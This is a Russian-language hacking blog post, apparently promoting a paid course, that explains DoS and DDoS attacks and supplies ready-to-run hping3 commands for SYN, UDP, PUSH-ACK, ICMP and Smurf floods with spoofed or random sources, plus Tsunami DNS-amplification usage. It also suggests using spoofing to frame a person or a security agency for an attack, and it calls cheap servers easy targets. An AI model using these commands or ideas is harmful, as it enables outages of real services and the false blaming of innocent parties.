Все, что вы хотели знать о DoS атаках

Всем салют, дорогие друзья!
Сегодня, по вашим просьбам, мы решили поговорить о DoS атаках, а так же дать вам инструменты и объяснить отличие DoS атак от DDos.
Погнали!

Данная статья будет полезна новичкам, которые только пришли в хакинг.
Стать настоящим гуру ты можешь, пройдя наше новое обучении версии CashFlow.
Если тебе интересно, то жми сюда и узнай все подробнее!


Ну а мы продолжаем!
Для начала напомним, что статья написана в образовательных целях. Мы не несем ответственности за любой возможный вред, причиненный материалами данной статьи.



DoS и DDos атаки.

Многие из вас не понимают разницу. Давайте усвоим это раз и навсегда :)

Говоря максимально просто:

Dos - атака, которая ведется с одной машины.

DDos - атака, которая ведется с двух и более машин. Обычно производится с использованием ботнета*

*Ботнет - это сеть компьютеров, зараженных вредоносным ПО, используя панель вы можете управлять всеми компьютерами за раз и заставлять их делать то, что вам нужно.



Софт для Dos атак

Начнем с классики. Утилита, которая меня в свое время очень поразила своим функционалом.

Смысл этой атаки таков:
Можно подставить любого человека или сами знаете какую силовую организацию в том что он(они) нападали на другую более серьезную организацию.

  • hping3 с успехом проводит SYN-флуд на TCP-протокол соединения, а он как вы знаете обладает трехсторонним рукопожатием:
hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE

  • UDP-флуд:
hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP
  • PUSH _ACK-флуд - если сервер раздразнить этим флудом, то он может обидеться и вообще перестать всех обслуживать:
hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP
  • ICMP_IGMP-флуд - это малоэффективная атака, нужно проводить долго и не одному но все же укажу её:
hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP
  • SMURF-флуд - это атака, при которой мы выбираем некоторые промежуточные сайты в качестве усилителей, а затем отправляем огромное количество запросов ICMP (ping) на эти промежуточные сайты для широковещательного IP-адреса. Таким образом, все исходные IP-адреса изменяются на целевые IP-адреса, которые передают эти пакеты хостам всех подсетей. Наконец, все ответы хоста отправляются обратно в цель:
hping3 --icmp --spoof TARGET_IP BROADCAST_IP



Те, кто давно в деле - помнят легенду, которая также проводит такие же атаки : TCP, UDP, HTTP.


Так же существует еще одна утилита, которая достойна вашего внимания: Tsunami - DNS Amplification Attack Tool

/tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8
./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt



Заключение

Сервак Google вы не отключите DoS атакой, необходима DDos атака с использованием очень крупного ботнета, а вот сервера, которые стоят 10-15$ в месяц - легко. На них, как правило, размещен всякого рода трэш и отчаянные попытки нажиться на простых людях.

Если тебе хочется подробнее узнать о атаках и методах их проведения на практике, то
Ждем тебя в Hacker Place Academy, будем играть по-крупному!

Спасибо за внимание, дорогой друг!